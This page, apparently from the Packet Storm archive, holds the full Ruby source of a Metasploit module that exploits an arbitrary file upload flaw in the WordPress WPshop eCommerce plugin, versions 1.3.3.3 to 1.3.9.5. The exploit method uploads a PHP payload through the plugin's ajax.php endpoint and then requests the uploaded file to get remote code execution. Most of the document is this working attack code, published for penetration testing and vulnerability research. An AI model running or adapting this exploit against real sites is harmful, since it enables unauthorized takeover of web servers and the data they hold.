exploit the possibilities

WordPress WPshop eCommerce 1.3.9.5 Shell Upload

WordPress WPshop eCommerce 1.3.9.5 Shell Upload
Posted Apr 24, 2015
Authored by g0blin | Site metasploit.com

This Metasploit module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin versions 1.3.3.3 to 1.3.9.5. It allows you to upload arbitrary PHP code and get remote code execution. This Metasploit module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.

tags | exploit, remote, arbitrary, php, code execution, file upload
systems | linux, ubuntu
MD5 | 47f05fc1fec0514454d17074ff974ce7

WordPress WPshop eCommerce 1.3.9.5 Shell Upload

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
code execution. This module has been tested successfully on WordPress WPshop eCommerce
1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
},
'Author' =>
[
'g0blin', # Vulnerability Discovery, initial msf module
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '7830'],
['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
'DisclosureDate' => 'Mar 09 2015',
'DefaultTarget' => 0)
)
end

def check
check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
end

def exploit
php_page_name = rand_text_alpha(5 + rand(5)) + '.php'

data = Rex::MIME::Message.new
data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
post_data = data.to_s

res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)

if res
if res.code == 200 && res.body =~ /#{php_page_name}/
print_good("#{peer} - Payload uploaded as #{php_page_name}")
register_files_for_cleanup(php_page_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, "#{peer} - Server did not answer")
end

print_status("#{peer} - Calling payload...")
send_request_cgi(
{ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
5
)
end
end
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    8 Files
  • 24
    Sep 24th
    15 Files
  • 25
    Sep 25th
    4 Files
  • 26
    Sep 26th
    1 Files
  • 27
    Sep 27th
    1 Files
  • 28
    Sep 28th
    20 Files
  • 29
    Sep 29th
    15 Files
  • 30
    Sep 30th
    84 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close